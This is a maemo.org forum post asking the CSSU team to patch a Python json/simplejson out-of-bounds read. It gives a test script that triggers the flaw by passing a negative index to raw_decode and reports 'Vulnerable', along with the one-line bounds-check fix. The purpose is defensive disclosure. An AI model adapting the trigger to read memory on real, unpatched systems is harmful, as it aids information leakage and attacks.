maemo.org - Talk - View Single Post - [Announce] CSSU devel, it may eat your brain

ade	2014-06-27 , 17:10
Posts: 1,100 \| Thanked: 2,797 times \| Joined on Apr 2011 @ Netherlands	#407

Originally Posted by misiak

Is there a python maintainer in CSSU team?

https://hackerone.com/reports/12297 - security issue found in python (2.7 and newer for sure, I'm not sure if 2.5 is also vulnerable - I couldn't run the sample code to test the issue and I'm not sure which additional python package I should install to run it)

Code:

user:~# cat vulnerability_test.py 
from simplejson import JSONDecoder
j = JSONDecoder()

a = '128931233'
b = "472389423"

if id(a) < id(b):
     x = a
     y = b
else:
     x = b
     y = a

diff = id(x) - id(y)

try:
     j.raw_decode(y, diff)
     print("Vulnerable")
except:
     print("Not vulnerable")

user:~# python
Python 2.5.4 (r254:67916, May 17 2010, 21:00:32) 
[GCC 4.2.1] on linux2
Type "help", "copyright", "credits" or "license" for more information.
>>> execfile("vulnerability_test.py")
Vulnerable
>>>

Assuming I tested it the correct way....

My desktop versions of python (3.3.5 and 2.7.6, importing json instead of simplejson) also report vulnerability at this moment. AFAIK there are no 2.5 patches available (only 2.7 and 3.x), as it is no longer supported.

The fix itself looks simple (in some json related code):

Code:

-    if (idx >= length) {
+    if ( idx < 0 || idx >= length) {

Quote & Reply |

The Following 5 Users Say Thank You to ade For This Useful Post:
foobar, fw190, misiak, peterleinchen, sixwheeledbeast